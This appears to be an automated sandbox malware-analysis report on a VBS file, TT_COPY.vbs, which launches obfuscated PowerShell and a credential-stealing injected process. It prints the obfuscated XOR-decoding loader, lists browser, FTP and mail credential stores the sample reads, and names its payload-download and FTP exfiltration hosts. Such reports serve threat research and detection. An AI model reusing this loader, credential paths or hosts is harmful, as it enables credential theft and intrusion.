'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 
'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br 
No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 
'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | 321 Scripting | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 115 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | 21 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 321 Scripting | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 22 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 241 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 241 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          No Antivirus matches
          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe | |
          | http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po | 0% | Avira URL Cloud | safe | |
          | http://OowQOv.com | 0% | Avira URL Cloud | safe | |
          | ftp://ftp.mcmprint.netnoffice | 0% | Avira URL Cloud | safe | |
          | https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe | |
          | http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe | |
          | https://wNUxderhdqerb.org | 0% | Avira URL Cloud | safe | |
          | http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16 | 0% | Avira URL Cloud | safe | |
          | http://go.micros | 0% | Avira URL Cloud | safe | |
          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | ftp.mcmprint.net | 185.31.121.136 | true | false | | unknown |
          | b3solutionscws.com | 192.185.145.188 | true | false | | unknown |
          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16 | false | Avira URL Cloud: safe | unknown |
          | Name | Source | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|
          | http://OowQOv.com | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
          | https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
          | http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po | CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
          | https://wNUxderhdqerb.org | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | ftp://ftp.mcmprint.netnoffice | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://go.micros | CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                  | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
                  |---|---|---|---|---|---|---|
                  | 192.185.145.188 | b3solutionscws.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
                  | 185.31.121.136 | ftp.mcmprint.net | Bulgaria | | 199364 | RAX-ASBG | false |
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:758166
                  Start date and time:2022-12-01 15:47:21 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 47s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:TT_COPY.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal96.troj.spyw.evad.winVBS@7/4@2/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 2556 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: TT_COPY.vbs
                  No simulations
                  No context
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):30
                  Entropy (8bit):3.964735178725505
                  Encrypted:false
                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                  MD5:9F754B47B351EF0FC32527B541420595
                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                  Malicious:false
                  Preview:NordVPN directory not found!..
                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):5.882508768775152
                  TrID:
                    File name:TT_COPY.vbs
                    File size:319816
